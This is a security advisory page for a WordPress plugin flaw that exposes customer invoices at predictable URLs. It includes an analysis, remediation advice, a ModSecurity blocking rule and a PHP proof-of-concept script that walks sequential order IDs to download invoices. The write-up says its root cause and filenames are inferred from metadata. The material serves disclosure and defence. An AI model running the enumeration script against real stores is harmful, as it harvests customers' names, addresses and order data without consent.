Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 23, 2026

CVE-2026-9612: WhatsOrder <= 1.0.1 Unauthenticated Sensitive Information Exposure via Predictable Invoice File URLs PoC, Patch Analysis & Rule

CVE ID CVE-2026-9612

Plugin whatsorder-instant-checkout-for-woocommerce

Severity Medium (CVSS 5.3)

CWE 200

Vulnerable Version 1.0.1

Patched Version —

Disclosed June 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-9612 (metadata-based): This vulnerability exposes sensitive customer data in the WhatsOrder – Instant Checkout for WooCommerce plugin for WordPress. All versions up to and including 1.0.1 are affected. The vulnerability allows unauthenticated attackers to enumerate and download invoice HTML files containing personal identifiable information (PII) and order details. The CVSS score is 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N), indicating a medium severity issue with low impact on confidentiality.

Root Cause: The likely root cause, based on the CWE-200 classification and the description, is that the plugin generates invoice files with predictable filenames tied to sequential order IDs. It stores these files in the wp-content/uploads/whatsorder_invoices/ directory without access controls. The directory lacks an .htaccess deny rule or index.php guard. The function yapacdev_generate_order_pdf creates these files, but the filenames (likely something like order-{ID}.html or invoice-{ID}.html) are enumerable. Atomic Edge analysis infers this from the vulnerability description; no source code confirmation is available since the plugin is not downloadable.

Exploitation: An attacker can exploit this vulnerability by sending HTTP GET requests directly to the invoice files in the publicly accessible directory. The attack targets URLs structured like: https://example.com/wp-content/uploads/whatsorder_invoices/invoice-{order_id}.html. For example, an attacker might use a script to iterate through order IDs starting from 1 until they find valid invoices. The attack requires no authentication and can be executed with a simple browser or curl request. No special headers or payloads are needed; the attacker simply accesses the file over HTTP. The description confirms that no authentication check is performed on these files.

Remediation: The fix requires two changes. First, the plugin should store invoice files outside the web-accessible directory, such as in wp-content/uploads/whatsorder_invoices/ with a .htaccess file that denies all access, or better yet, in a custom directory outside the web root. Second, the plugin should use a non-predictable filename, such as a UUID or a hash of the order ID combined with a secret salt. Additionally, the plugin should implement an access control check when serving invoice files, requiring at least the order’s associated customer to be logged in or to possess a unique token. Since no patched version is available, site administrators should delete the vulnerable plugin directory or replace it with a secure alternative.

Impact: The primary impact is exposure of sensitive customer PII and order details. An attacker can obtain full customer names, email addresses, phone numbers, billing addresses, order items with prices, applied coupons, shipping methods, and order totals. This data leak violates customer privacy and may expose the site owner to regulatory penalties under GDPR, CCPA, or similar laws. The vulnerability does not allow privilege escalation or remote code execution, but the data exposure can aid in targeted phishing attacks or identity theft.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-9612 (metadata-based)
# Blocks direct HTTP access to the predictable invoice files in wp-content/uploads/whatsorder_invoices/
# This rule narrows to the exact directory path and file pattern.
SecRule REQUEST_URI "@rx ^/wp-content/uploads/whatsorder_invoices/(invoice-|order-)[0-9]+.(html|htm|pdf)$" 
  "id:20269612,phase:2,deny,status:403,msg:'CVE-2026-9612 - WhatsOrder invoice file enumeration attempt blocked',severity:'CRITICAL',tag:'CVE-2026-9612'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-9612 - WhatsOrder <= 1.0.1 - Unauthenticated Sensitive Information Exposure via Predictable Invoice File URLs

// This proof-of-concept enumerates sequential order IDs to retrieve invoice HTML files.
// It assumes the invoice filename pattern is 'invoice-{id}.html' based on common WordPress plugin conventions.
// Adjust $base_url to the target WordPress installation.

$target_url = 'https://example.com'; // Change this to the target site URL
$invoice_dir = '/wp-content/uploads/whatsorder_invoices/';
$max_order_id = 100; // Adjust as needed. Start from 1.

for ($order_id = 1; $order_id <= $max_order_id; $order_id++) {
    $invoice_url = $target_url . $invoice_dir . 'invoice-' . $order_id . '.html';
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $invoice_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing; use true in production
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    if ($http_code == 200) {
        echo "[+] Found invoice for Order ID $order_id:n";
        echo $response . "nn";
        // Optionally save to file: file_put_contents("invoice-$order_id.html", $response);
    } elseif ($http_code == 404) {
        echo "[-] No invoice for Order ID $order_id (HTTP 404)n";
    } else {
        echo "[*] HTTP $http_code for Order ID $order_idn";
    }
}
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations